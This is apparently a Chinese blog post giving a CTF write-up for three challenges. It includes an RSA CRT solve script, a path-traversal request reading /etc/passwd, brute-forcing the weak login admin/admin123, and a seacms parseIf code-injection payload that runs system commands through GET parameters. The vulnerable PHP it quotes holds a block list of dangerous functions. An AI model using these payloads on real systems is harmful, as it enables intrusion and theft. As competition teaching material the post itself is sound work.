2025磐石行动第二周WP

最新推荐文章于 2025-04-14 22:26:17 发布
最新推荐文章于 2025-04-14 22:26:17 发布
阅读量395 收藏 5
点赞数 5
分类专栏: 磐石行动 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44394805/article/details/146361662
版权

1、dpdqdr

题目源码:

#coding:utf-8
import gmpy2
from Crypto.Util.number import *

p = getPrime(512)
q = getPrime(512)
r = getPrime(512)
e = getPrime(32)
n = p*q*r
phi = (p-1)*(q-1)*(r-1)
d = gmpy2.invert(e,phi)
dp = d%((q-1)*(r-1))
dq = d%((p-1)*(r-1))
dr = d%((p-1)*(q-1))
flag = 'DASCTF{XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}'+PADDING
m = bytes_to_long(flag.encode())
c = pow(m,e,n)

print(p)
print(q)
print(r)
print(dp)
print(dq)
print(dr)
print(c)

#12922128058767029848676385650461975663483632970994721128398090402671357430399910236576943902580268365115559040908171487273491136108931171215963673857907721
#10395910293559541454979782434227114401257890224810826672485874938639616819909368963527556812339196570118998080877100587760101646884011742783881592586607483
#8104533688439480164488403019957173637520526666352540480766865791142556044817828133446063428255474375204188144310967625626318466189746446739697284656837499
#73360412924315743410612858109886169233122608813546859531995431159702281180116580962235297605024326120716590757069707814371806343766956894408106019058184354279568525768909190843389534908163730972765221403797428735591146943727032277163147380538250142612444372315262195455266292156566943804557623319253942627829
#40011003982913118920477233564329052389422276107266243287367766124357736739027781899850422097218506350119257015460291153483339485727984512959771805645640899525080850525273304988145509506962755664208407488807873672040970416096459662677968243781070751482234692575943914243633982505045357475070019527351586080273
#21504040939112983125383942214187695383459556831904800061168077060846983552476434854825475457749096404504088696171780970907072305495623953811379179449789142049817703543458498244186699984858401903729236362439659600561895931051597248170420055792553353578915848063216831827095100173180270649367917678965552672673
#220428832901130282093087304800127910055992783874826238869471313726515822196746908777026147887315019800546695346099376727742597231512404648514329911088048902389321230640565683145565701498095660019604419213310866468276943241155853029934366950674139215056682438149221374543291202295130547776549069333898123270448986380025937093195496539532193583979030254746589985556996040224572481200667498253900563663950531345601763949337787268884688982469744380006435119997310653

exp如下:

p = 12922128058767029848676385650461975663483632970994721128398090402671357430399910236576943902580268365115559040908171487273491136108931171215963673857907721
q = 10395910293559541454979782434227114401257890224810826672485874938639616819909368963527556812339196570118998080877100587760101646884011742783881592586607483
r = 8104533688439480164488403019957173637520526666352540480766865791142556044817828133446063428255474375204188144310967625626318466189746446739697284656837499
dp = 73360412924315743410612858109886169233122608813546859531995431159702281180116580962235297605024326120716590757069707814371806343766956894408106019058184354279568525768909190843389534908163730972765221403797428735591146943727032277163147380538250142612444372315262195455266292156566943804557623319253942627829
dq = 40011003982913118920477233564329052389422276107266243287367766124357736739027781899850422097218506350119257015460291153483339485727984512959771805645640899525080850525273304988145509506962755664208407488807873672040970416096459662677968243781070751482234692575943914243633982505045357475070019527351586080273
dr = 21504040939112983125383942214187695383459556831904800061168077060846983552476434854825475457749096404504088696171780970907072305495623953811379179449789142049817703543458498244186699984858401903729236362439659600561895931051597248170420055792553353578915848063216831827095100173180270649367917678965552672673
c = 220428832901130282093087304800127910055992783874826238869471313726515822196746908777026147887315019800546695346099376727742597231512404648514329911088048902389321230640565683145565701498095660019604419213310866468276943241155853029934366950674139215056682438149221374543291202295130547776549069333898123270448986380025937093195496539532193583979030254746589985556996040224572481200667498253900563663950531345601763949337787268884688982469744380006435119997310653



n = 3         # 同余方程个数
a = [dp,dq,dr]     # 余数
m = [(q-1)*(r-1),(p-1)*(r-1),(p-1)*(q-1)]  # 模数


"""扩展欧几里得"""
def exgcd(a, b):
    if 0 == b:
        return 1, 0, a
    x, y, q = exgcd(b, a % b)
    x, y = y, (x - a // b * y)
    return x, y, q
 

"""扩展中国剩余定理"""
def CRT():
    if n == 1 :
        if m[0] > a[0]:
            return a[0]
        else:
            return -1
     
    for i in range(n):
        if m[i] <= a[i] :
            return -1

        x, y, d = exgcd(m[0], m[i])
        if (a[i] - a[0]) % d != 0:
            return -1    
            
        t = m[i] // d
        x = (a[i] - a[0]) // d * x % t
        a[0] = x * m[0] + a[0]
        m[0] = m[0] * m[i] // d
        a[0] = (a[0] % m[0] + m[0]) % m[0]
    print(a)
    return a[0]


d = CRT()
print(d)
m = pow(c,d,p*q*r)
from Crypto.Util.number import long_to_bytes
print(long_to_bytes(m))

2、新生入学

dirsearch情况如下:

在这里插入图片描述
点击下载发现GET /download.php?url=word.zip,修改url=/etc/passwd
在这里插入图片描述

flag如下:

flag{8d12d12377d2b0cbaa75d90b8da483d9}

3、神奇的CMS

通过目录扫描发现.DS_store

发现You_Cant_Guess.zip

在这里插入图片描述

然后[Index](http://192.168.0.10:10005/web/You_Cant_Guess.zip)
得到两个控制文件,采用Yii框架,看不懂,这条路走不通

发现Backup和ADD_IMG都是需要登录之后才能使用,那么前面的登录逻辑看不出啥,那就只能是弱口令爆破,

接着发现登录的地方没有啥校验,可以进行爆破,但是这个地方又遇到一个坑,就是burp默认的字典没有admin123这个密码,最后使用top3000才爆破出来。

接着使用admin/admin123登录成功

在这里插入图片描述

在backup的地方得到flag位置的提示

You_Cant_Guess.zip
Flag in /tmp/flag

通过输出的内容,

    public function actionShow(){
        $template = '<h1>图片内容为:</h1>图片ID:{cms:id}<br>图片名称:{cms:name}<br>图片地址:{cms:pic}';
        if (isset($_GET['id'])) {
            $model = new Content();
            $res = $model->find()->where(['id' =>intval($_GET['id'])])->one();
            $template = str_replace("{cms:id}",$res->id,$template);
            $template = str_replace("{cms:name}",$res->name,$template);
            $template = str_replace("{cms:pic}",$res->url,$template);
            $template = $this->parseIf($template);
            echo $template;
        }else{
            return json_encode(['error'=>'id error!']);
        }
    }

输出的name和pic先简单的替换,之后经过parseIf之后进行处理。这个地方又进入一个坑。
不知道开始咋想的,直接就跳过了parseIf函数,发现pic输入的内容直接替换,发现存在xss漏洞,花了很长时间试着用xss读文件。反正最后也没搞定。

在这里插入图片描述
接着想着直接写入<?php phpinfo();?> 发现不解析,然后各种尝试发现都不行。

在这里插入图片描述

然后开始关注parseIf函数

    public function parseIf($content){
        if (strpos($content,'{if:')=== false){
            return $content;
        }else{
            $labelRule = $this->buildregx("{if:(.*?)}(.*?){end if}","is");
            $labelRule2="{elseif";
            $labelRule3="{else}";
            preg_match_all($labelRule,$content,$iar);
            foreach($iar as $v){
                $iarok[] = str_ireplace(array('unlink','opendir','mysqli_','mysql_','socket_','curl_','base64_','putenv','popen(','phpinfo','pfsockopen','proc_','preg_','_GET','_POST','_COOKIE','_REQUEST','_SESSION','_SERVER','assert','eval(','file_','passthru(','exec(','system(','shell_'), '@.@', $v);
            }
            $iar = $iarok;
            $arlen=count($iar[0]);
            $elseIfFlag=false;
            for($m=0;$m<$arlen;$m++){
                $strIf=$iar[1][$m];
                $strIf=$this->parseStrIf($strIf);
                $strThen=$iar[2][$m];
                $strThen=$this->parseSubIf($strThen);
                if (strpos($strThen,$labelRule2)===false){
                    if (strpos($strThen,$labelRule3)>=0){
                        $elsearray=explode($labelRule3,$strThen);
                        $strThen1=$elsearray[0];
                        // $strElse1=$elsearray[1];
                        @eval("if(".$strIf."){\$ifFlag=true;}else{\$ifFlag=false;}");
                        if ($ifFlag){ $content=str_replace($iar[0][$m],$strThen1,$content);} else {$content=str_replace($iar[0][$m],$strElse1,$content);}
                    }else{
                        @eval("if(".$strIf.") { \$ifFlag=true;} else{ \$ifFlag=false;}");
                        if ($ifFlag) $content=str_replace($iar[0][$m],$strThen,$content); else $content=str_replace($iar[0][$m],"",$content);}
                }else{
                    $elseIfArray=explode($labelRule2,$strThen);
                    $elseIfArrayLen=count($elseIfArray);
                    $elseIfSubArray=explode($labelRule3,$elseIfArray[$elseIfArrayLen-1]);
                    $resultStr=$elseIfSubArray[1];
                    $elseIfArraystr0=addslashes($elseIfArray[0]);
                    @eval("if($strIf){\$resultStr=\"$elseIfArraystr0\";}");
                    for($elseIfLen=1;$elseIfLen<$elseIfArrayLen;$elseIfLen++){
                        $strElseIf=$this->getSubStrByFromAndEnd($elseIfArray[$elseIfLen],":","}","");
                        $strElseIf=$this->parseStrIf($strElseIf);
                        $strElseIfThen=addslashes($this->getSubStrByFromAndEnd($elseIfArray[$elseIfLen],"}","","start"));
                        @eval("if(".$strElseIf."){\$resultStr=\"$strElseIfThen\";}");
                        @eval("if(".$strElseIf."){\$elseIfFlag=true;}else{\$elseIfFlag=false;}");
                        if ($elseIfFlag) {break;}
                    }
                    $strElseIf0=$this->getSubStrByFromAndEnd($elseIfSubArray[0],":","}","");
                    $strElseIfThen0=addslashes($this->getSubStrByFromAndEnd($elseIfSubArray[0],"}","","start"));
                    if(strpos($strElseIf0,'==')===false&&strpos($strElseIf0,'=')>0)$strElseIf0=str_replace('=', '==', $strElseIf0);
                    @eval("if(".$strElseIf0."){\$resultStr=\"$strElseIfThen0\";\$elseIfFlag=true;}");
                    $content=str_replace($iar[0][$m],$resultStr,$content);
                }
            }
            return $content;
        }
    }

通过函数内容猜测payload格式应该为:{if:(.*?)}(.*?){end if}

然后在网上学习这个东西,居然发现了wp

seacms v6.61 审计深入思考-安全KER - 安全资讯平台 (2025_3_19 09:44:48)

我们添加图片为

name: skysec
pic: {if:1)$GLOBALS['_G'.'ET'][sky]($GLOBALS['_G'.'ET'][cool]);die();//}{end if}

然后访问

http://101.71.29.5:10013/web/index.php?r=content%2Fshow&id=1919&sky=system&cool=ls

得到flag如下:

在这里插入图片描述

[Dify] 利用工作流打造高质量的 RAG 对话体验
技术就是小甜甜博客
04-14 211
本文展示了如何借助 Dify工作流功能实现一个具备“语义理解 + 上下文判断 + 搜索增强”的 RAG 系统。其关键特性包括:✅ 上下文相关性判断,提升对知识库问题的适配度✅ 结构清晰的IF / ELSE分支,逻辑更具鲁棒性✅ 非知识库问题引入搜索引擎+LLM生成,更真实实用✅ 自动化与交互能力显著强于传统聊天机器人模式通过合理设计工作流逻辑,我们可以将 RAG 系统从一个“问答工具”升级为一个“智能对话专家”。
[AI ][Dify] 构建一个自动化新闻编辑助手:Dify 工作流实战指南
每日出拳老爷子的博客
04-14 399
本文展示了如何在 Dify 平台中构建一个完整的AI 驱动新闻编辑助手,通过模块化的节点组合,实现从内容获取到成品输出的全过程自动化。
Dify 中自带的门诊导诊工作流(Chatflow)
NLP工程化
11-14 7201
本文使用 Dify v0.7.2 版本。此聊天流程展示了如何构建一个用于门诊导诊的聊天机器人,可通过网页或语音对话来收集病人的数据。简单理解,即根据患者信息(年龄、性别和症状),给患者推荐科室。
Dify工作流节点-迭代
最新发布
同名公众号:dify实验室
04-14 2171
如果需要处理超过 10 个任务,前 10 个元素将率先同时运行,前排任务处理完成后将继续处理剩余任务。迭代节点将依次处理迭代开始节点数组变量内的所有元素,每个元素遵循相同的处理步骤,每轮处理被称为一个迭代,最终输出处理结果。例如输入变量为 [1,2,3] ,则输出变量同样为 [result-1, result-2, result-3]。迭代节点的输出变量为数组格式,无法直接输出 String 字符串内容。对数组中的元素依次执行相同的操作步骤,直至输出所有结果,可以理解为任务批处理器。包含不限于:Dify
掌握这些Dify工作流程,轻松提升你的效率!
大数据指北
10-29 3058
掌握这些Dify工作流程,轻松提升你的效率
Dify开发平台实战
xyzcto的博客
03-01 2455
Dify的应用实例,通过自然语言查询数据库
dify案例分享-基于文本模型实现Fine-tune 语料构造工作流
Code1994的博客
01-18 7837
微调(Fine-tuning)是指在已经预训练好的大规模模型基础上,通过进一步训练来适应特定任务或数据集的过程。这一过程体现了迁移学习的思想,即利用预训练模型在通用数据上学习到的知识,通过微调使其更好地服务于特定的应用场景.
Dify平台工作流编排教程-从基础概念到实施落地(附案例)长文慎入
同名公众号:dify实验室
03-27 5263
1. 核心节点功能表节点名称类型功能描述典型应用场景开始(Start)核心节点定义工作流启动的初始参数,作为流程起点初始化用户会话、设置默认参数结束(End)核心节点定义工作流结束的最终输出内容,作为流程终点返回最终结果、结束用户交互回复(Answer)核心节点定义Chatflow中的回复内容,直接输出给用户生成自然语言回复、提供解决方案大语言模型(LLM)AI/模型节点调用大语言模型处理自然语言任务(如生成、推理)回答问题、创作文本、语义分析。
大模型(deepseek)之运用Dify构建智能体和工作流应用
qq_31400983的博客
11-17 3万+
完成设置后回到主页面,可以看到顶部的4个页面。“探索”页面提供了模板应用程序,用户可参考模板定制自己的应用程序。“工作室”页面用户可创建自己的应用,包括聊天助手、智能体、工作流。“知识库”页面用户可以通过上传自己的文本数据创建知识库增强 LLM 的上下文。“工具”页面是Dify本身集成第三方工具,用户也可自定义工具。
【AI】DeepSeek+Dify构建知识库、Agent(智能体)、工作流、聊天助手
python1234567_的博客
02-18 7869
昨天看到一个网友说"不会使用DeepSeek,那么这东西到普通人手里,就是百度Plus版",这么说也不无道理。为什么DeepSeek会掀起这么大的浪潮,是因为过去我们想实现的很多事情都要基于机器对自然语言的理解,比如机器人发展了很久,现在有了机器狗、人形机器人,但还是需要遥控去控制,而不具备自主思维。再比如刚出来的Gpt、文心一言,更像是拼凑起来的文字,具有浓重的程序化风格。
[Dify] Dify Agent 全指南:构建自动完成任务的智能体
技术就是小甜甜博客
04-14 299
Dify Agent 提供了极强的自动化与智能决策能力,适合开发复杂度更高的任务型 AI 应用。其核心优势包括:✅ 具备任务规划与迭代能力✅ 可动态调用工具如搜索与时间判断✅ 自动处理流程,真正实现“智能体”行为通过为 Agent 配置合理模型、上下文与工具,我们就能构建出真正“能动”的 AI 角色。
Dify+函数计算,快速搭建工作流应用
HULK一线技术杂谈
12-26 1353
一、Dify简介Dify是一款开源的大语言模型(LLM)应用开发平台。它融合了后端即服务(Backend as Service)和LLMOps的理念,使开发者可以快速搭建生产级的生成式AI应用。即使您是非技术人员,也能参与到AI应用的定义和数据运营过程中。同时Dify内置了构建LLM应用所需的关键技术栈,这为开发者节省了许多重复造轮子的时间,使其可以更加专注在创新和业务需求上。技术架构如下图所示。...
基于Dify工作流全流程测试
羊城迷鹿的博客
10-09 4710
下面是工作流官方文档中给出的工作流定义,其实工作流Agent调用的对象是一样的,都是预先定义好的智能体。不过工作流是在一个确定的任务空间里面,根据预定义的长且复杂的智能体链条去完成任务;Agent则要利用大模型的语义理解能力,首先从无穷的语义空间中进入一个有限的任务空间,再将潜在的智能体空间与这个任务空间做对齐,通过重复的思考-尝试-反馈思维链条去迭代出一个相对来说较为简单的智能体调用链。
[Dify] 深入理解 Dify 工作流:批量运行与执行控制技巧
技术就是小甜甜博客
04-13 787
Dify 中,工作流是由多个模块组成的任务流程,用户可以通过图形化界面将模型调用、判断逻辑、自定义脚本等节点自由编排,构建一个可重复执行的任务链条。通过以上实践,我们可以看到 Dify 工作流不仅支持 AI 模型调用,还支持复杂逻辑控制与批量任务处理,是构建 AI 驱动业务流程的利器。
dify v1.2.0 重磅发布!工作流循环节点+多场景增强,效率翻倍,开发者的终极利器!
福大大架构师每日一题
04-11 858
大家好!这一版本不仅是功能的大幅跃升,更是开发者体验的全新升级。无论是工作流的自动化效率、多语言支持,还是底层架构的稳定性,Dify 团队与全球开源社区共同交出了一份令人惊艳的答卷!本次更新覆盖,更有备受期待的功能登场!无论你是 AI 应用开发者、企业技术负责人,还是自动化流程的深度用户,这次更新都将为你的生产力插上翅膀!
Dify 到 Rill-Flow:大模型应用平台的进化之路
Code1994的博客
01-22 1572
经过不断的发展和实践,我们的大模型应用平台从最初整合多个大模型 API 接口,提供简单的问答功能,并通过 dify 项目提供复杂工作流的流程编排能力,到后来将工作流引擎的执行切换到 rill-flow 项目,在保证前端操作体验不变的同时优化了工作流的性能表现和稳定性。
Dify+DeepSeek-R1: 我的超强AI工作流,详细的部署与使用实录
热门推荐
2401_85375186的博客
02-04 6万+
上面演示的只是Dify最简单的聊天应用知识库和工作流的使用,还有更多的功能和工作流值得您挖掘,更多高级的用法玩Dify工作流本身就像搭积木一样,用它来搭建各种有趣的 AI 应用。比如做一个智能客服,帮你自动回答客户的问题;或者做个私人助理,帮你整理文档、写邮件、做会议记录;甚至可以做个创意助手,帮你写文案、做营销策划、设计广告语。你不需要写复杂的代码,只要像拖拽积木一样,把不同的功能模块组合在一起,就能做出你想要的应用。它就像是给你一套 AI 魔法工具,让你能轻松地把脑子里的想法变成现实。
入门Dify平台:工作流节点分析
fenfenfen520a的博客
03-24 423
要让智能体在实际应用中表现出色,掌握工作流的使用至关重要。今天,我们将深入探讨Dify平台中的各个节点的功能,了解它们的使用方法以及常见的应用场景。通过对这些节点的全面了解,将能够高效地设计和优化智能体的工作流流程。好了,言简意赅,直接进入正题。 节点概览 首先,我们创建一个工作流或者是chatfl
dify 循环
03-28
<think>好的,我现在需要帮助用户解决关于Dify循环实现的问题。首先,我需要明确用户的具体需求。他们提到“dify 循环实现”或“dify 如何处理循环”,但Dify本身可能没有直接称为“循环”的功能,所以需要结合现有文档中的信息来推断可能的解决方案。 根据用户提供的引用内容,Dify工作流中有迭代节点[^1]。这可能类似于编程中的循环结构,用于重复执行某个任务。例如,在处理列表数据或需要多次执行同一操作时,迭代节点可以派上用场。我需要详细解释迭代节点的配置和使用步骤,确保用户能够理解如何设置循环次数或遍历数据集。 另外,用户可能对如何处理循环中的错误或性能问题感兴趣。引用[2]提到在Dify中处理PEM文件的问题,这可能涉及在循环中正确处理数据格式,避免错误积累。需要提醒用户在循环中注意错误处理和资源管理,确保每次迭代的稳定性。 引用[3]中的例子展示了如何结合FastAPI和Selenium进行实时监控并生成GIF,这可能涉及循环截取浏览器内容。虽然Dify本身可能不直接控制这类循环,但可以通过外部脚本或定时任务触发工作流,模拟循环执行。这部分需要说明如何将外部循环机制与Dify结合使用。 接下来,我需要组织回答结构。首先介绍迭代节点的基本概念和配置步骤,然后讨论循环中的数据处理和错误处理,最后补充外部触发循环的方法。同时,生成相关问题以帮助用户进一步探索,比如优化循环性能或处理复杂数据结构。 需要确保回答符合格式要求,使用正确的中文表达,行内公式用$...$,独立公式用$$...$$,但当前问题不涉及数学公式,所以可能不需要使用。同时,引用标识要自然地添加到相关段落末尾,如、[^2]、[^3]。 最后,检查是否有遗漏点,比如Dify的其他循环相关功能或用户可能遇到的常见问题,确保回答全面且易于理解。</think>在Dify中处理循环逻辑主要通过**迭代节点**实现,以下是具体实现方式和应用场景的解析: ### 一、Dify循环实现机制 Dify通过**工作流设计器**中的迭代节点处理循环需求,其核心原理类似编程中的`for循环`。迭代节点可遍历以下数据类型: - 数组列表:`["A","B","C"]` - 字典集合:`{"key1":"value1", "key2":"value2"}` - 数值范围:通过`range()`函数生成序列 配置示例: ```python # 模拟迭代节点的数据输入 input_data = { "dataset": [1,2,3,4,5], "process_logic": "item * 2" # 对每个元素执行乘以2的操作 } ``` ### 二、迭代节点的关键配置步骤 1. **数据源绑定**:将数组/字典类型变量连接到迭代节点的输入端口 2. **循环变量命名**:设定当前元素的变量名(默认为`item`) 3. **子流程设计**:在迭代节点内部构建需要重复执行的逻辑模块 4. **结果聚合**:通过`outputs`收集所有迭代结果,支持数组或对象格式 $$ \text{总耗时} = \sum_{i=1}^{n}(单次迭代时间_i) + 系统开销 $$ ### 三、循环中的特殊处理 1. **错误中断控制**: - 启用`continueOnError`参数可跳过失败迭代 - 通过`try-catch`模块包裹敏感操作 2. **并行优化**: ```python # 伪代码示例 Parallel.forEach(dataset, lambda item: process(item)) ``` 3. **结果过滤**: ```python filtered = filter(lambda x: x%2==0, processed_results) ``` ### 四、应用场景案例 1. **批量文件处理**:遍历存储桶中的文件列表进行格式转换 2. **数据清洗**:对数据库查询结果集进行逐条校验 3. **API轮询**:定时循环调用第三方接口直到满足特定条件
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值